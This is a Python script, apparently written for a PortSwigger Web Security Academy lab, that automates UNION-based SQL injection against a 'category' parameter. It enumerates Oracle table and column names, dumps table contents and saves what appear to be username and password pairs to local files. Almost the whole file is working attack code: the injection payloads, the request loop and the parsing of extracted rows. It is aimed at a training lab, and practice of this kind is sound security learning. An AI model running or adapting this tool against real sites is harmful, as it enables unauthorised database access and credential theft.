#!/usr/bin/env python3
import sys
import re
import requests
import signal
# Global vars
# Hostname of the lab instance (a web-security-academy.net host); every
# request this script sends goes to that host's /filter endpoint.
host = 'ac2a1f861fb1fc5080dc1b9700460076.web-security-academy.net'
url = f'https://{host}/filter'
# Ctrl+C handler
def signal_handler(sig, frame):
    """Print a short exit notice and terminate the process with status 1.

    Both arguments are supplied by the ``signal`` module and are unused.
    """
    print('\n[!] Saliendo ... ')
    # Raising SystemExit directly is what sys.exit(1) does.
    raise SystemExit(1)
# Route SIGINT (Ctrl+C) to signal_handler so the script exits through it
# instead of surfacing a KeyboardInterrupt at whatever line is running.
signal.signal(signal.SIGINT, signal_handler)
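def sqli_requests(sqli):
    """Send one GET request to the lab's /filter endpoint and parse the reply.

    Args:
        sqli: String sent verbatim as the ``category`` query parameter.

    Returns:
        The list produced by ``data_filter`` when the response contains a
        ``<tbody>``; the raw response body (``str``) when it does not; the
        empty string when the request itself failed.
    """
    # Fixed browser-like headers. requests percent-encodes ``params``, so the
    # value shows up encoded in the ``category`` query string of request logs.
    header = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
    }
    payload = {'category': sqli}

    try:
        # The timeout keeps the interactive loop from hanging forever on an
        # unreachable host.
        r = requests.get(url, params=payload, headers=header, timeout=30)
    except requests.RequestException:
        # No response object exists on this path, so there is no URL or body
        # to print; the old handler crashed here on the unbound name ``r``.
        print("Unexpected error:", sys.exc_info()[0])
        return ''

    try:
        # data_filter accepts exactly one argument, the response body.
        return data_filter(r.text)
    except IndexError:
        # data_filter found no <tbody> (an error page, for instance): report
        # it and return the raw body so the caller can inspect it.
        print(r.url)
        print("Unexpected error:", sys.exc_info()[0])
        print ("Web content: ")
        return r.text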
def data_filter(text):
    """Return the strings found between a '>' and the next '</' in the <tbody>.

    Only the first ``<tbody>...</tbody>`` match is scanned, and a captured
    string never spans a line break because ``.`` does not match newlines.
    Prints a notice when the page contains the lab's "Solved" marker.

    Raises:
        IndexError: if ``text`` has no ``<tbody>...</tbody>`` section.
    """
    tbody_sections = re.findall(r'(?:<tbody>)([\s\S]*)(?:<\/tbody>)', text)
    cells = re.findall(r'(?<=>)(.*?)(?=<\/)', tbody_sections[0])

    solved_marker = re.search(r'<p>Solved</p>', text)
    if solved_marker is not None:
        print ('Congratulations, you solved the lab!')
    return cells
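def enum_tables(db_name):
    """Write the rows of one table to a text file and return its column names.

    Despite the parameter name, ``db_name`` is used as a table name in both
    queries.

    Args:
        db_name: Table name, interpolated unescaped into both query strings
            and, after sanitising, into the output file name.

    Returns:
        Whatever ``sqli_requests`` returned for the column-name query.
    """
    # main() passes names scraped from an HTTP response, so they are untrusted
    # on this side too: keep only identifier characters so a name containing
    # '/' or '..' cannot move the output file out of ../info/tables/.
    safe_name = re.sub(r'[^A-Za-z0-9_$#]', '_', db_name)
    name = '../info/tables/ORACLE_db_tables_{0}.txt'.format(safe_name)

    #ORACLE
    info_table = sqli_requests('\'UNION SELECT column_name,NULL FROM ALL_TAB_COLUMNS where table_name=\'{0}\'-- -'.format(db_name))
    #Postgres
    # info_table = sqli_requests('\'UNION SELECT column_name,NULL FROM information_schema.columns where table_name=\'{0}\'-- -'.format(db_name))
    extract_info = sqli_requests('\'UNION SELECT * from {0}-- -'.format(db_name))

    # The context manager closes the file even if a write fails. The file
    # stores the retrieved values in clear text (presumably username/password
    # pairs, going by the variable names), so treat it as sensitive.
    with open(name, 'w', encoding='utf-8') as tables:
        # sqli_requests returns a str (the raw page, e.g. 'Internal Server
        # Error') on failure; only a parsed list holds rows worth writing.
        if isinstance(extract_info, list):
            # Pair consecutive cells; a trailing unpaired cell is dropped
            # instead of raising IndexError on an odd-length list.
            for user, passwd in zip(extract_info[::2], extract_info[1::2]):
                tables.write("{0} : {1}\n".format(user, passwd))
    return info_table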
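def main():
    """Run the interactive prompt loop until the user types ``exit``.

    Each round reads an option and a ``category`` value, sends it with
    ``sqli_requests`` and either prints the result (any option other than
    ``enum``) or, for ``enum``, records every returned value containing
    ``'USER'`` and passes it to ``enum_tables``.
    """
    while True:
        option = input('[ manual (default) | enum (emumeration databases) ] Option: ')
        if option == 'exit':
            sys.exit(0)

        sqli = input("SQLI: ")
        data = sqli_requests(sqli)
        if option != 'enum':
            print(data)
            continue

        # The context manager closes the file even when enum_tables raises.
        with open('../info/databases/ORACLE_db_names.txt', 'w', encoding='utf-8') as f:
            for name in data:
                if 'USER' in name:
                    # One name per line; without the separator the names ran
                    # together into a single unreadable string.
                    f.write(name + '\n')
                    enum_tables(name)


if __name__ == "__main__":
    main()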